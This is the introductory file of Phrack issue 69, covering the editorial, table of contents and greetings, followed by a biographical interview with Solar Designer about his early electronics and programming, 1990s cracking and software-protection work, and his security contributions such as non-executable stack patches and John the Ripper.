Phrack #69

EDB-ID: 42880
CVE: N/A
Author: phrack
Type: papers
Platform: Magazine
Published: 2016-05-06

                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x01 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Introduction ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------=[ by the Phrack staff ]=------------------------=|
|=-----------------------=[ staff@phrack.org ]=--------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  May 6, 2016  ]=---------------------------=|
|=-----------------------------------------------------------------------=|

               ... A long time ago in a galaxy far far away ...

                     ______ _                    _
                     | ___ \ |                  | |
                     | |_/ / |__  _ __ __ _  ___| | __
                     |  __/| '_ \| '__/ _` |/ __| |/ /
                     | |   | | | | | | (_| | (__|   <
                     \_|   |_| |_|_|  \__,_|\___|_|\_\


                            _  _    ____  _____
                          _| || |_ / ___||  _  |
                         |_  __  _/ /___ | |_| |
                          _| || |_| ___ \\____ |
                         |_  __  _| \_/ |.___/ /
                           |_||_| \_____/\____/




--[ Introduction

Hello Phrack readers! It has been a long time, hasn't it? Aren't you
relieved that the world didn't end in 2012?! What if the Mayans were right?
What if comets hit Earth? Yes, we were worried too, so we decided to take
some time off and enjoy the last days of this planet. Once enough time had
passed, we were pretty sure our species was not going to disappear. It was
about time we returned to our blinking terminals again and finished what we
started :>

Um... yeah, that's the reason the last Phrack release was back in 2012...
Um... Kind of...

Damn, it took so long that even a Star Wars sequel was shot in the
meantime!

Anywayz, the Phrack Staff is back again, with a slightly different
editorial, bringing you an awesome collection of articles from several
respected hackers and other thinkers. No, we are not going to write a
Prophile on our new team. Yes, there are still people who prefer Phrack
over media whoring. The world is full of surprises. It took quite some
time, but we hope this issue of Phrack will meet your expectations.

One new addition to Phrack is the "Paper Feed" feature. The way it works is
that you submit a paper, we review it and it gets published. No need to
wait a month (or two years ;-) until you see your article in the next
Phrack issue. When the time has come, we'll decide to compile a new issue
from the articles that have been submitted. The usual rules do however
still apply: we are proud of being one of the longest-running magazines and
we're especially proud of presenting quality content to our readers (yes,
that's you). Papers submitted to the paper feed are no exception!

Phrack #69 brings you three new technical articles in addition to paper
feed and the standard Linenoise, Loopback and International Scenes philes.
The Firefox hater code-named argp presents advanced exploitation techniques
and attempts to build abstract primitives for taking advantage of various
memory-related vulnerabilities on your "favorite" multi-heap browser ;>
Huku, some guy who, obviously, visits porn sites a lot, has written an art
of exploitation phile focusing on Adobe Flash Player (hey, this is not
P0 man!). Last but not least, uty presents a VT-x based technique for
installing inline hooks and backdooring a whole system. We have spent much
time debugging this, we hope you *do* like it.

This release also comes with an excellent prophile on Solar Designer, a
person we all respect for his knowledge, attitude and contributions. We
were initially hesitant to contact him (yeah this guy has a damn busy
schedule), but it turned out that Solar was positive about being
prophiled. We believe this prophile will inspire a lot of people in the
scene - it's undoubtedly one of the best prophiles ever published in Phrack
and a great honor for all readers.

Enjoy maafakaz!


--[ Dark thoughts about the future

As we mentioned above, you have probably noticed a big change in the way
Phrack papers are released. We have decided to also have a paper feed mode
in addition to periodic releases, where each submitted work, that meets the
requirements, is released as soon as it has undergone proper reviewing. We
understand that this may not be as cool as releasing an issue at once, but
it was a necessary choice we had to make to avoid having Phrack fade out of
existence. The hope with this is that now all you crazy world-traveling,
conference-speaking rockstars may have a medium for releasing a deeper dive
into the technology that you are presenting, and we can publish this at
the exact moment you are on stage. Personally, we would much prefer this
to trying to extract it ourselves from your pretty slide decks.

I guess we are all responsible for this. The community as a whole. The
hackers, the phreakers and all those tech perverts out there who have
stopped supporting Phrack. Trust me, you would be disappointed if you had a
look at our inbox... or maybe no one uses ANTISPAM anymore? :>

For all you hackers out there thinking "I don't have a large project
ready for paper generation", consider writing something for Linenoise.
Linenoise submissions take between a few hours and one day. As a community,
everyone has some small technique or cool trick that can save other people
time, and Linenoise offers an easy place to share these.

In this issue you will find a very interesting article titled "The Fall of
Hacker Groups". Take some time to read it through and wonder why the fuck
did we get here. The state of mind of the community seems to be changing
dramatically - what have you done to prevent hacking from practically
disappearing?

Quoting Phrack #63:

    "As long as there are hackers, there will be PHRACK magazine."

Now take some time, read this issue carefully, and notice the "as long as"
part in the previous sentence :>


--[ Table of contents

  0x01  Introduction ........................................ Phrack Staff

  0x02  Phrack Prophile on Solar Designer ................... Phrack Staff

  0x03  Phrack World News ................................... Phrack Staff

  0x04  Linenoise ........................................... various

  0x05  Loopback ............................................ Phrack Staff

  0x06  The Fall of Hacker Groups ........................... strauss

  0x07  Revisiting Mac OS X Kernel Rootkits ................. fG!

  0x08  Adobe Shockwave:
        A case study on memory disclosure ................... Aaron Portnoy

  0x09  Modern Objective-C Exploitation Techniques .......... nemo

  0x0a  Self-patching Microsoft XML with misalignments
        and factorials ...................................... Alisa Esage

  0x0b  Internet Voting: A Requiem for the Dream ............ kerrnel

  0x0c  Attacking Ruby on Rails Applications ................ joernchen

  0x0d  Obituary for an Adobe Flash Player bug .............. huku

  0x0e  OR'LYEH? The Shadow over Firefox .................... argp

  0x0f  How to hide a hook: A hypervisor for rootkits ....... uty & saman

  0x10  International Scenes ................................ various


--[ Greetings & thanks

For this issue we have a long list of people we would like to thank. This
issue wouldn't be complete had it not been for their support.

  * strauss       : Straus.. staruss... strsauss.. whatever man!
  * fG!           : The legendary white hat(ed) hero!
  * Aaron Portnoy : Real name detected!
  * nemo          : That lolcat you see in various memes ;-)
  * Alisa Esage   : Knows how to write exploits and doesn't work for P0
  * kerrnel       : What's with the extra "r"?
  * joernchen     : Ruby two-handed fapper
  * argp          : Hardcore Shakira fan - Favorite song "Heaps don't lie"
  * huku          : Casual youporn uploader
  * sysk          : Proud yolo Phrack supporter
  * uty & saman   : Makefiles suck!
  * solardiz      : Awesomeness prophiled
  * fjserna       : Guest reviewer of, well, you can figure out what
  * anonymous     : You know who you are, thanks for your support!

Last but not least, Phrack Staff is indebted to <redacted> *wink* *wink*
for his support all these years. You have our respect for everything you
have offered to this magazine. We are now in different teams, but we will
always be glad to have some beers with you and talk about dirty hacks ;>
See you soon man!

Phrack is back! Prepare your arse for a new awesome release of your
favorite zine.


--[ Phrack policy

phrack:~# head -77 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */


                      ----( Contact )----

       <  Editors           : staff[at]phrack{dot}org   >
       >  Submissions       : staff[at]phrack{dot}org   <
       <  Commentary        : loopback[@]phrack{dot}org >
       >  Phrack World News : pwned[at]phrack{dot}org   <


    Submissions may be encrypted with the following PGP key:
    (Hint #1: Always use the PGP key from the latest issue)
    (Hint #2: ANTISPAM or it didn't happen)



|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x02 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[   Solar Designer   ]=-----------------------=|
|=-----------------------------------------------------------------------=|

|=---=[ Specifications

          Handle: Solar Designer
             AKA: solardiz.  Also, I used to hide under my real name.
   Handle origin: A turn-based game played over FidoNet (which IIRC I
                  played just once, but it took a while), and demoscene.
                  In 1994, I needed a handle to register on "private"
                  BBSes where real names were discouraged.  I chose this
                  one without giving it much thought, and it has stuck.
Age of your body: Older than Pushkin
 Height & weight: Quite some & not much
     Produced in: USSR
            Urlz: http://www.openwall.com/phrack
                  I imagine it will be gone when a historian reads this
                  many centuries later.
       Computers: B3-21, MK-52, (no longer have my EC-1841), 386DX40+387,
                  2x MicroVAX 3100-80, 2x Sun Ultra 5/10, Alpha 164SX (and
                  I had a 21066-based Multia for a year before), HP 712/80,
                  development boards (ZedBoard + Epiphany FMC, many ZTEX
                  FPGA boards waiting for their use), routers, etc. (the
                  EdgeRouter Lite is MIPS64, runs FreeBSD, and is used for
                  general development, so surely qualifies as a computer?)
                  HP200LX, Nokia Communicator series (9110, 9300, N900).
                  Lots of semi-ancient x86 (e.g., dual Pentium 3, RIMMs)
                  and many x86-64 (some laptops, etc.), some of which are
                  frankly what I actually use these days.  Some GPUs and
                  Xeon Phi in boxes we've set up for the larger community.
      Creator of: I'm the original author of most of the individual pieces
                  of software released under Openwall, including John the
                  Ripper password cracker and Linux 2.0.x to 2.4.x -ow
                  security hardening patches (now historical).  Openwall
                  GNU/*/Linux distro, with a team.  More recently yescrypt,
                  with 1.0 release planned in 2016.  Assorted programs for
                  DOS in a previous life, including (but not limited to)
                  "software protection" and cracks.
       Member of: Back in 1990s: BPC, uCF; I also participated in w00w00.
        Admin of: Openwall.  We host some moderated mailing lists, etc. -
                  including e.g. oss-security and kernel-hardening, and
                  also including the private distros list (which sort of
                  replaced vendor-sec and those predating it, and which I
                  always have mixed feelings about).  That's already-public
                  info, and it has to be such, so no OPSEC fail here.
        Projects: Most of those currently active at Openwall.
           Codez: You mean stuff that is of more hack and historical value
                  than of direct use?  I am often reminded of those first
                  ret2libc exploits I sent to Bugtraq in 1997.  I'll
                  mention a few more further in this prophile.
    Active since: 1994?  I was not into "the scene" before.
  Inactive since: 1997?  I no longer release under a group since then, so
                  maybe not on the scene either?  Besides, we got a
                  CFAA-alike in Russia since 1997, limiting the playground.
                  That said, I was doing computer stuff before 1994, and I
                  still am now.

|=---=[ Favorites

   Actors: Not really.  I think screenplay matters more.  I recognize some
           screenwriters and directors like Gilliam and Zemeckis.  Oh,
           actually, let me agree with PaX Team's answer here - Chaplin -
           as this is consistent with what I just said.
    Films: I can't pick just a few favorites, but I was relieved to find
           out that The Shawshank Redemption ranks so high on IMDB.  Maybe
           humanity has hope (or at least IMDB reviewers do).
  Authors: I really would rather not name just a few, or I'd later regret.
           (I already almost regret mentioning just some directors above.)
 Meetings: What's meant to go into this field?  Where to meet?
           Restaurants, cafes, bars without loud music (unless
           intentionally attending a live performance).  I'd also consider
           meeting at a hackerspace.  I rarely meet people in person,
           though.  To compensate for that, I really like it how there are
           now two practical ("non-paper") computer security cons in Moscow
           per year - PHDays in May and ZeroNights in November - with
           mostly the local crowd, but always also some foreign speakers
           and attendees.
      Sex: What's the right answer?  Something like y?(+++++++)?
    Books: I'd say encyclopedia.  Now that would be Wikipedia.
    Novel: Sadly, I am not reading much.  If I were, I would probably not
           be able to single out just a few titles.  As a kid, I read War
           and Peace, and I liked it.  (I hear it was also taught in Soviet
           schools, but luckily I skipped that and read it of my own will.)
           More relevant to Phrack readers, I also recall I liked reading
           (in 1990s) Stephen King's The Dead Zone and John Varley's Press
           Enter (OK, that one is too short for a novel, and I had to look
           up who wrote it to refer to it now, but I did in fact like it).
  Meeting: HAL2001 stands out because it was a first for me, and I liked
           its atmosphere and extent.
    Music: There are few genres that I don't recall ever enjoying listening
           to, but I tend to especially like rock, jazz, bossa nova.
  Alcohol: Dark beer
     Cars: No favorite, and not my thing, but some do look stylish to me or
           have a history or fiction attached to them (such as the
           DeLorean, which apparently wasn't that good a car otherwise).
           I also value the designers' achievements.  At a local retro
           sports car exhibition last year, it was interesting for me to
           see how greatly the horsepower per cc and torque per cc improved
           over the years, and how a few custom engines stood out.  It's an
           optimization problem not entirely unlike what we have in
           computing and communications, where some designs were also
           "ahead of their time".
    Girls: Not between Cars and Food
     Food: Italian is usually a safe bet
   I like: All sorts of freedom (as long as it doesn't infringe on someone
           else's), free time, good people, nature, (im)perfection
I dislike: Simply inverting the "I like" above would be bad enough as it is
           (except that (im)perfection is its own inverse).
           I'd rather not provide even worse (or better, from adversary's
           POV) hints than that.  Oh, I'll add just one: filling out guinea
           pig forms like this... but who am I to break the tradition?

|=---=[ Life in 3 sentences

Way too little achieved in this much time.  I could do a lot more, but if I
act unnaturally would that still be me?  (Rhetorical.)

|=---=[ Passions, what makes you tick

Curiosity and self-defined challenges (especially if unannounced so they
don't become a drag) combined with whatever else I like.

|=---=[ Memorable experiences

You suggest some questions along the lines of "how did you start?" to be
answered for your readers further in my prophile, so I'll turn this section
into a background story for answering those.  It got rather long (and
off-topic?), so your readers should feel free to skip to the next section
and maybe revisit this one later.  Here we go, with some recalled or maybe
just made up computer and electronics related experiences from the 1980s and
1990s roughly in chronological order:

Nearly winning a Darwin award as a kid.  Before I got access to computers,
I was having fun with electrical circuits, and some of those experiments
were not well-suited for a kid nor always conducted with appropriate
precautions.  Luckily, this only made me stranger.  When I was 8, I learned
the hard way that you don't test a hypothesis by assuming it's true and
just letting things go wrong if you're wrong, if "wrong" can mean it'd be
the last thing you'd realize.  If you feel you need to test, you recognize
there's a chance you are (or something is) wrong.  It's just like how you
shouldn't test whether your restarted sshd still works by first logging out
and then trying to log back in - something I still see adults do,
presumably because they were not that close to being Darwin winners as kids.

Playing with Soviet cable radio during a few of the "technical breaks"
(when normal broadcast stopped).  Listening to foreign shortwave stations
(DXing?), including through the jamming (was more tolerable out of town).

Finding near the garbage cans a cabinet drawer with tools (including a
soldering iron), electronic parts, and all 12 of the Soviet "Radio"
magazine issues from 1966.  I guess someone had passed away, someone who
ended up having some influence on me.  (Later I actually built and briefly
tested an 80 meter band transmitter described in one of those issues, based
on two vacuum tubes, but I never got into ham radio.)

Fast arbitrary precision division (typically 5 digits per iteration),
writing down some 100+ digit periodic sequences, which felt like magic
(will this thing repeat after N-1 digits again? oh yes it does), on a
non-programmable 8-digit calculator.  I came up with the algorithm on my
own.  I didn't know the word "algorithm" back then, nor programming.

Exploring and eventually programming my father's B3-21, with great fun.

Getting some written-off Soviet mainframe boards with K155 series TTL chips
on them (equivalent to 74 series), mostly K155LA3 (7400).  Luckily, a book
on those just happened to arrive at a nearby bookstore, so I started
building my own logic circuits.  I recall craving for more K155TM2's (7474,
dual D flip-flops), which were lacking.  I ended up desoldering a K155TM2
from an expensive toy, which I was done playing with, to build my own toys
with the flip-flops.  In general, almost all of the electronic parts I was
building circuits from had been previously used.  You couldn't just go to a
store and buy parts that you needed when you needed them.  For example, I
didn't have enough LEDs, so I used transistors and bulbs to indicate logic
levels as if it were the 1960s or 70s.

Since 1989 or so, having sporadic time-limited access to BK-0010 and a
variety of x86 ranging from different PC/XT clones (with green phosphor
CGA and Hercules monitors) to early 386+287 (with early vendor-specific
SVGA) and then even the super fast & pricey 386+387 33 MHz.  (I think 486s
were still subject to CoCom export regulation.)  There was also a Japanese
24 pin dot matrix printer capable of up to 360 dpi, with a decent user's
manual on its escape sequences, so I actually printed graphics in 360 dpi
on it, multi-pass and very slow of course.  My own vector font, too,
created in my own font editor.  Not having much time to debug code on the
actual machines, I initially wrote programs on paper and debugged them
mentally, then typed them in and they had to work right with only minor
changes needed.  (This skill later proved especially helpful for firmware
modification, as well as for exploits.)

It's during this period that I learned 16-bit x86 asm through reading some
books and a printout of the disassembly of KILL.COM, a ~4 KB DOS TSR
program that allowed a user to forcibly kill the currently active program
and return to DOS, with both this tool and the Sourcer disassembler having
been given to me by a friend on a floppy.  Other languages explored
included: BASIC dialects; Fortran for bringing programs (that my father was
using for work) from mainframes to PC; Turbo Pascal, which worked the
smoothest, but couldn't use 386's protected mode yet (unlike one of the
Fortran compilers, which could).  (A bit later, I wrote a Fortran 66 to
Pascal source level translator that would reconstruct program structure
from all those labels.  Many years later, I migrated some of those Pascal
programs to Linux/Alpha, building them with GNU Pascal, mostly for fun.)
I also briefly started with C in 1990 or so, but soon abandoned it because
of inefficient static linking under DOS (too much dead code).

Back then, and in DOS, the command-line felt like it was being obsoleted by
tools such as Norton Commander (and then its many clones) and Borland's or
Microsoft's recently introduced IDEs for their compilers, but somehow not
for the assemblers, nor for Fortran.  By 1992, I had my own IDE developed
for DOS (yes, first written on paper, piece after piece, and then typed in
during those occasional computer sessions), which had its own text editor
(as well as bells and whistles such as a calculator - but no, exploits
didn't pop it up) and it was capable of running the CLI compilers with
their output captured via INT 10 intercept and analyzed, so it would place
the cursor right at the error line, just like those vendors' IDEs did.  Of
course, it could also run the just-compiled program... and it could kill
it, too.  Somehow I felt this was important enough for me to have bothered
with all this effort (or maybe it was just about the challenge, as usual).
Over a few years, I also worked on other TUIs and GUIs for various programs
(ranging from 320x200 CGA to weird VGA ModeX resolutions and to 1024x768
SVGA under DOS, with my own drivers and my port of Borland's Turbo Vision
from text to graphics modes).  (It's only after I discovered Unix that I
realized I am perfectly comfortable using a compiler from the command-line,
and don't really need IDEs.  These days, I am not using any IDE.  Maybe I
also moved to developing different kinds of software, where IDEs are less
helpful.  I'm not opposed to using an IDE again for the right project.)

MK-52 with its whopping 512 bytes of EEPROM on top of these calculators'
tiny program and data memories.  Yeggogology, where you explore the
undocumented world of the calculator trying not to hit the darkness (you
have to power-cycle when you do).

Together with my father, buying our first home computer, the Soviet PC/XT
software compatible EC-1841, from its previous owner, for a full bag of
Soviet 5 ruble banknotes weighing a few kilograms.  IIRC, my father got
those earlier the same day as a withdrawal of a very recent payment (so not
yet eaten up by the inflation), which came for a project I contributed to
as well.  Somehow the bank only had sealed packs of 5 ruble bills.

"Snow" on CGA screens, and suppressing it, or choosing not to - for speed.

Low-level formatting a brand new unformatted 20 MB MFM hard drive (ST-225),
for a neighbor's EC-1845, with a program I wrote for this one occasion (OK,
I cheated - used BIOS calls - but not a do-it-all routine, which I was not
aware of and might not have had in my BIOS).  Tuning the interleaving, too.

In 1993, already on a 386 at home, cracking a key floppy protected program,
using nothing but DOS debug, paper and pencil, many reboots and patience.
Since then and until 1996, I went into both cracking and creating "software
protection" systems - initially naive, then smarter, and eventually moving
from simple code encryption and anti-debugging tricks (eventually confusing
non-patched SoftICE alright through inconsistent opcode and ModR/M byte
combinations, handling those on INT 6) to use of VMs (NOR CPU, reinventing
OISC as I realize now).

A couple of years later, a brief encounter into creating key floppies for
software protection, with arbitrarily-numbered different-size sectors on a
track and some decoys.  A Win16 DLL, written in asm and using Win16/DPMI/
BIOS calls, to check this floppy.  BIOS actually allowed for a lot of
flexibility through temporarily patching the diskette parameter table from
a critical section.  Of course, this was easily crackable in software, but
that was OK for the given project.

Game programming, on all devices ranging from the calculators (for
turn-based games, as the only way to provide input without interrupting the
program was via the radian-degree switch) to computers.  Reuse of ChiWriter
printer fonts for good-looking large captions on screen.  Playing some
computer games too.  Eventually own multi-window graphics/sprite editor,
own adventure game engine (both recently reused in DOSBox for my ZeroNights
2014 keynote game, and as a toy for my son, who ended up adding so many
sprites to his game that he triggered a stack overflow in the game engine).

Getting on BBSes via a 2400 bps modem in 1993.

Getting on the Internet and on Unix in 1994 - and revisiting C programming.
FTP sites, Archie.  Then early web sites, AltaVista.  X.25 PADs, mostly as
a means to get to a system that would have Internet.  Linux kernel 1.2.3 on
my 386.  Playing mouse to retain Internet access and development access to
non-x86 boxes, and getting a bit carried away.  Back then, I didn't quite
realize I was merely playing mouse, with cats out there.  I also didn't
realize not all other players treated this as a game.  I did have other
ways to get online, such as when physically visiting places that had
Internet access, as well as by using single-line dialups that friends set
up in such places, but I couldn't reasonably use them as much as I wanted
to and they were not part of the game.

Implementing DES in assembly for 32-bit SPARC to use double-register load
and store instructions (thus, 64-bit), which the C compiler somehow
wouldn't use.  The fun part was debugging this on x86, as I didn't have a
SPARC at home yet and didn't want to do it all online, so I wrote a partial
SPARC to x86 assembly source level translator to let me get the computation
right before testing and optimizing on a remote Sun machine.  (Later I also
wrote similar DES code in assembly for Alpha, but debugged it on the real
thing right away.)

Longwave (a few hundred kHz carrier) radio transmission experiment from my
resistor-based Covox on the 386's printer port.  I could pick up Led
Zeppelin's Immigrant Song, which I had digitized from an audio cassette at
6-bit 20 kHz mono via a two-transistor comparator on the same Covox and was
now transmitting, on a commodity receiver from a few meters away.  So I
totally reinvented software-defined radio on my own, having no idea it was
already a thing (Wikipedia says so).  Now this could be called an airgap
bypass PoC (or not, since the receiver wasn't a computer), but I didn't
think in such terms back then.  (And yes, I didn't have a real soundcard.)

Audio playback via floppy drive motors (2 signal levels: low on 3.5", high
also on 5.25").  Yes, Immigrant Song again.  It's only recently that I
learned others did this too (there are videos on YouTube), albeit
apparently without the 2-level separation (and instead with multiple
channels) and for sheet music rather than for arbitrary audio recordings.

A brief experiment with blueboxing using the same Covox, with little luck:
the line responded to 2600+2400, but seemingly ignored other CCITT #5
signals.  (Apparently, blueboxing with different signaling worked on
ex-USSR lines, but usually wasn't completely free, and I never tried to get
into it.  Arbitrary dual-tone capability was even included in the Russian
Courier modems, which were different hacks of USR modems.)

USR Courier modem firmware hacking: I put a debugger with disassembler and
breakpoint support right in there, available via added AT commands, just
for fun.  (How do you implement breakpoints when the code is in EEPROM and
the CPU lacks hardware breakpoint support?  By keeping the CPU in
single-step mode while there's a breakpoint set!  Is it still fast enough
for the modem to work, then?  Turns out that for the supervisor CPU, not
the DSP, the answer is yes, although the lag is barely bearable.)

The disassembler I wrote had only 164 bytes of native code (could it be the
smallest disassembler ever written for a complete CISC ISA?), with the rest
(over 2 KB) being data: a special-purpose data structure with arbitrary bit
patterns to match and strings to print, and cross-references for reuse of
common patterns and substrings across instruction groups.  Is this possibly
interpreted code in a domain-specific language rather than data?  "What's
the difference?"  (WOPR's answer in WarGames, could be about code vs. data)

Making mostly non-impressive intros, probably not my thing.  I might have
contributed to the smallest categories appearing (128-byte initially) by
advocating this in a Russian FidoNet group where the first such competition
was then carried out (and where my entry shared second place with another
participant's), with other competitions in these sizes appearing
internationally shortly thereafter (as the 20 intros from the first Russian
competition were uploaded to foreign sites).

Winning a contest for smallest "mkdir -p" implementation for DOS, with a
20-byte entry: BA 82 00 5F B8 5C 39 31 05 47 AE 75 FD 4F 31 05 CD 21 EB F0.
How does this program terminate cleanly?  Self-modifying code, and moreover
letting the program XOR over itself.  (The contest rules were weird: only
documented DOS features and startup register values, yet OK to require
trailing backslash.  19 bytes was demonstrated possible, and less than that
might be, with reliance on undocumented startup register values.)

Being wrong yet over-confident or/and elitist on some occasions - luckily
not many (that I recall).  Not good of me.

In 1997, joining an ISP (by demonstrating a vulnerability, of course) and
starting to play cat to keep mice under control (but not hurt), as well as
not needing to play mouse myself anymore.  A tiny unreleased exfiltration
detector I wrote at the time was called Tom.  There was also, in modern
terms, a metadata analysis tool for traffic to one of the first social
networks - ICQ, which was extremely popular among Windows users here - to
keep track of abusers on dialup lines despite changing accounts, and even
be alerted when a friend-of-abuser shows up.  That tool I never let
anyone else use, and never released, for ethical reasons.  (Of course, I
was "entitled" to use it, right?..  Oh, excuses.)

On a related note, caller IDs were very common at homes in Russia, starting
to appear in early 1990s.  These were based on inexpensive telephones with
most of their original contents thrown out and replaced by a board with a
Soviet clone of 8080 or with an imported Z80 CPU.  They reused in-band
signaling initially intended for use by long-distance exchanges (with the
caller's line disconnected for a moment with a relay at their local phone
exchange, to prevent spoofing), but technically also available to the
called party on local calls (and easily audible and tamperable with by the
caller, since the long distance call's anti-spoofing relay wasn't
triggered).  Despite their popularity at homes, they were almost never
used on dialup lines.  Similarly, while some late modem firmware hacks
included caller ID functionality for ex-USSR, those were targeted at
consumers (including e.g. FidoNet nodes) rather than ISPs.  It's only with
the move of dialup lines to digital interfaces (E1) reaching into the ISPs
in late 1990s to early 2000s that caller numbers commonly started to appear
in TACACS+ or RADIUS server logs at ISPs.  Until then, it was cheaper to
extract and selectively log ICQ UINs.

Also in 1997, posting a rough non-executable user stack patch for the Linux
kernel to LKML while running it on my very computer, and being told that it
can't work (because signal handlers, which I had already worked around in
the patch I posted, and gcc trampolines, which I had not encountered yet
due to libc5 rather than early glibc).

The ISP's chief sysadmin's reaction when I casually mentioned that my Linux
kernel patch we were about to install on the servers had just started to
use ring 2, in addition to 0 and 3.  (We did install, and it worked great.)

Apparently, forgetting my childhood Darwin lessons and letting a coworker
at the ISP flash my modified firmware (fixing a connection stability
issue) into all 16 of the modems in a Total Control unit without
power-cycling it after the first flash... and getting the checksum wrong.
Oops.  (The modems then worked fine until power-cycle.)  Luckily, recovery
was as easy as for the individual Courier modems, so not a big deal, but it
did cost some downtime for those 16 lines (there were many more already).

Tweaking L2 cache timings of the dying Multia to prolong its life, having
read up on 21066's "internal processor registers".  Then returning it to
its owner and buying 164SX+21164PC of my own in 1998, and tweaking L2 cache
timings via 21164PC's different IPRs the other way for speed (years later,
my tweaks would turn out to reliably result in a specific miscompile when
building our Linux distro, Owl - oops).  Tweaking a Modeline for 2000x1500
on a 21" CRT (worked, but was painful to look at because of low refresh
rate; I actually used 1600x1200).  In general, tweaking lots of things.

Finally playing with VMS on VAX a little bit (and VT420's, with yellow
phosphor for a change), including e.g. mounting a filesystem from tape -
something normally not possible on Unix where tape drives are character
devices.  DECnet between Linux and VMS.

This brings us almost to 2000s.  I'll cover some of the newer stuff below.

|=---=[ Quotes

I have no favorites, but I find these relevant:

"Is this a game or is it real?"  (WarGames)

"If you shame attack research, you misjudge its contribution.  Offense and
defense aren't peers.  Defense is offense's child."  (John Lambert)

|=---=[ What's your opinion about Phrack?

I was about 10 years late to the party.  I think I got my hands on a pack
of Phrack issues for the first time in 1994 or 1995.  Phrack has been
changing: it had already changed by the time I first saw it, and it has
changed since.  I think that's fine.  It doesn't need to revert to the
US-centric phreaking/anarchy zine of 1980s, nor try to play the same role
that it did in 1990s now that there are many other alternatives.

Over the many Phrack issues so far, it captures diversity and evolution of
the underground.  The diversity just among the people prophiled is of such
extent that on one hand they don't quite fit (e.g. I'm mildly offended to
be prophiled after certain other individuals had been some issues before),
but on the other that's how it is in life.  Similarly, the philes range
from utter crap (luckily not much of it, such as the uncalled-for ridicule
in the Loopbacks) to inspirational or capturing the diversity of scene
spirit or (lately) opinions on the scene dying (or maybe not), and to
quality technical content (a lot of it).

Of course, opinions on what constitutes utter crap vary.  For some of your
readers, much of what I wrote above will be whitehat crap (ethics huh?) or
just off-topic (historical software development thoughts in Phrack, huh?
where are all the sploits? yet that's the balance I preferred, as the
prophile is on me and I'm not only into (in)security and colored hats).

As I don't worship Phrack, frankly I've actually read or even skimmed over
only a minority of the issues/philes.  With my Issue #53 article and this
prophile, I've probably already spent more time writing for Phrack than
reading it.  As a Soviet joke goes, I'm a writer and not a reader.

|=---=[ What would you like to see published in Phrack?

I like good people and quality content, but I realize that the diversity is
also what makes Phrack valuable as what it has been so far.

So the diversity should be preserved, albeit not to the extent where us the
"sensitive whitehats" (really, even with some of the risque fiction I wrote
above?) or them the "terrible blackhats" would refuse to contribute to
further issues.  Of course, I don't mean these labels literally - as FX
said and I agree, undef($hat); - oh and Perl is fine with me, but I do
think the editors need to strike a balance between whatever there is.

|=---=[ What do you think is the role of Phrack in the current "scene" that
        is dominated by "cons"?

Phrack is in fact less important now that there are so many other ways to
share one's experience, research, or rants - and by far not only at cons.

What I think Phrack may continue to provide is perspective over an extended
period, including via these prophiles, as well as by soliciting and
selecting for publication articles that are of longer-term relevance.

|=---=[ Who or what inspired you to start hacking?

Friends have helped introduce me to things, and conversely I made friends
while doing things.

Technical challenges.  Curiosity to explore.  Exposure (and addiction?) to
the networked world beyond local BBSes, and survival (will I be on the net
tomorrow?)

|=---=[ We know that no one will ever admit he's part of the underground,
        but, when and how did you enter it? :>

What's underground and what's not is fuzzy, but as it happened in 1994 a
friend I had made on BBSes/FidoNet invited me (as a coder) to a group he
was starting and to private BBSes.  At about the same time, I also got on
the Internet and wanted to retain my access and to explore, and I got in
touch, via IRC and such, with folks in other countries, both demoscene and
software cracking scene.  As I recall, mARQUIS of the recently formed uCF
had released a cracked version of EXE Manager, my software protection
tool.  I joined their channel for a friendly discussion, and ended up
being invited to and joining the group.

|=---=[ What do you consider your most notable technical achievement?

May I list several that I find somewhat notable?  I think all but possibly
the most recent would have been invented by others by now.

I think I helped accelerate the move from shellcode to borrowed code, with
that 1997 posting of first ret2libc exploits.  Initially, this appeared to
have had no effect, but then things started changing, and changing a lot.

In the same posting, I also introduced what later became known as ASCII
armoring (unfortunately, a term that was already used to refer to something
unrelated: binary to text encoding in PGP).  I suggested placing code that
should be out of easy reach of exploits via C strings at addresses that
contain at least one NUL byte in them.  (In that posting, I called this a
"fix", which I now regret.  I should have written "partial mitigation".)

I was first to bring non-executable memory protections to Linux and to x86,
initially just the stack (then extended to much more by PaX Team).  This
was not unique for operating systems in general - there was already Casper
Dik's patch for Solaris on SPARC, and Digital Unix on Alpha had
non-executable stack by default - but it was new to Linux, to x86, and to
free software (Solaris was non-free).  At first, upstream maintainers
opposed this, but later (when I had given up and moved on) it was embraced
by Linux and other free and non-free operating systems.  If I had not
started that discussion/controversy at the time, and someone else did
later, maybe the persuasion timer would start ticking later as well.

JtR's incremental mode, in its initial form introduced right with version
1.0 in 1996 (and tested privately in an unreleased cracker in 1995), was
novel: being able to search a password space exhaustively, yet in a smart
order.  Before JtR, it was one or the other: dumb exhaustive search, or
smart non-exhaustive search.  (I guess NSA and the like must have
developed approaches like this before and beyond, but I am unaware of
publications or released tools of this kind predating JtR.)  With this
approach, already on computers of the time, it was practical to crack some
non-word-based yet word-like 7- and 8-character Unix passwords.

JtR's built-in ability to train on previously cracked passwords (generate
incremental mode's sorted charsets), IIRC introduced in 1997, was probably
novel as well.  Indeed, people were optimizing wordlists, etc. based on
cracked passwords before, but not with a built-in feature of the cracker.

